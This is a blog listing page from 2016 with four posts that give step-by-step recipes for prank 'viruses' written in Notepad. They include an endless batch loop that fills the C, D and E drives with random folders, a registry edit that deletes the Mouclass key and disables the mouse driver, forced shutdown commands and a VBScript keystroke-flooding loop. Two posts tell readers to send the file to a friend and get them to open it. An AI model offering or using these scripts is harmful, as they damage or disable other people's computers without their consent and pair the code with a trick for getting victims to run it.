Showing posts with label computer virus. Show all posts
Showing posts with label computer virus. Show all posts

Wednesday, 27 April 2016

Virus That Create Multiple Folders in All Drives

Virus That Create Multiple Folders in All Drives

Today,We are Going to create a "Virus That create Multiple Folder in all Drives."




Prerequisite

1. A Computer.
2. Notepad.

Steps to Create Virus


1. Go to Start Menu.
2. Open Notepad.
3. Copy the Following Code Given Below.

@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS

__________________________________

5. Give this File to your Friend & tell him to Open The File. It will create Random Folder in all Drive.

Make a Virus That Disable your Mouse

Make a Virus That Disable your Mouse

Today, We are going to create a Virus that Disable your Mouse.






Prerequisite

1. A Computer.

Steps to Create Virus


1. Go to Start Menu.
2. Open Notepad.
3. Just Copy and Paste the Code 

___________Code___________
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem --------------------------------

4. Save the File with ".bat" Extension.
5. Send this File to your Friend & Tell him to Open The file. His Mouse will not work after Opening the File.



Wednesday, 13 April 2016

Virus That Shutdown Computer


Virus That Shutdown Computer

Today, We are going to create a "Virus" that Shutdown Computer.


We Requied Only:-

1.A computer.
2.Notepad.

Steps to Create virus :-


1.Open Notepad.
2.Type "shutdown.exe -s".This Command will immediately Shutdown Computer.
3.If you Want to Give some Time Use Command "shutdown.exe -s -t 45".This Command will Shutdown Computer after 45 seconds.
4.If you want to leave a Message Use Command "shutdown.exe -s -t 45 -c "comment"". At the Place of Comment You Can write your Message which You want to Show.
6.Run the Newly-Created File to run Your Shutdown Process.

____________________________Thankyou________________________________

Tuesday, 12 April 2016

Virus That Disable Keyboard

Virus That Disable Keyboard

Today, We are going to create a "Virus" that disable keyboard.


We Requied Only:-

1.A computer.
2.Notepad.

Steps to Create virus

1. Open Notepad.
_______________CODE__________________
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "This is a Virus. You have been infected."
loop
_______________________________________

3. Save the Notepad File with (.vbs) 
4. Open the Notepad file.
5. You can See that Your keyboard is not working.



How to solve this problem....?

Just only Restart your Computer.


____________________________Thankyou________________________________